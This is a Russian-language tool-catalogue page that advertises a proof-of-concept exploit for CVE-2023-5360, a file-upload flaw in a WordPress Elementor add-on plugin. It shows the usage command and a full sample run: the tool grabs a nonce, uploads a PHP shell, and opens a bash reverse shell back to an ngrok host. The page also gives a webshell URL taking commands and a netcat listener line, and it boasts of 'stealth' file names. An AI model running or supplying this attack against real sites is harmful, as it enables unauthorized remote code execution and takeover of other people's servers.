Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-5360 — Royal Elementor Addons — неаутентифицированное удалённое выполнение кода | Kitploit
Инструменты/GitHubGitHub/x3rx3ssec/cve-2023-5360
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubx3rx3ssec/cve-2023-5360

CVE-2023-5360

Royal Elementor Addons — неаутентифицированное удалённое выполнение кода

Репозиторий
2111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-5360 Эксплойт загрузки файлов Elementor

Плагин Royal Elementor Addons and Templates для WordPress до версии 1.3.79 не выполняет должную проверку загружаемых файлов, что может позволить неавторизованным пользователям загружать произвольные файлы, например PHP, и добиваться удалённого выполнения кода (RCE).

root@kitploit:~
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S

Описание

Это proof-of-concept эксплойт для CVE-2023-5360, уязвимости загрузки файлов в Elementor Pro для WordPress. Он позволяет неавторизованному злоумышленнику загружать произвольные PHP-файлы и получать удалённое выполнение кода.

Возможности

  • Автоматически получать nonce Elementor
  • Загружать простой веб-шелл или реверс-шелл
  • Уникальные имена файлов для скрытности
  • Необязательный помощник для запуска Netcat-слушателя
  • Офигенно секси

Использование

root@kitploit:~
python3 CVE-2023-5360.py <https://victim.site/>

Пример:

root@kitploit:~
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣

Варианты полезной нагрузки:

  1. Простой командный веб-шелл (?cmd=id, например: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. Реверс-шелл (Bash)

Зависимости

  • Python 3.x
  • модуль requests

Установка зависимостей:

root@kitploit:~
pip install requests

Пример слушателя

root@kitploit:~
nc -lvnp 1337

Отказ от ответственности

Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования безопасности. Вы несёте ответственность за то, как вы его используете. Тестируйте только на системах, которые принадлежат вам или на тестирование которых у вас есть разрешение.

Авторы

Автор: X3RX3S CVE-2023-5360

Скачать инструмент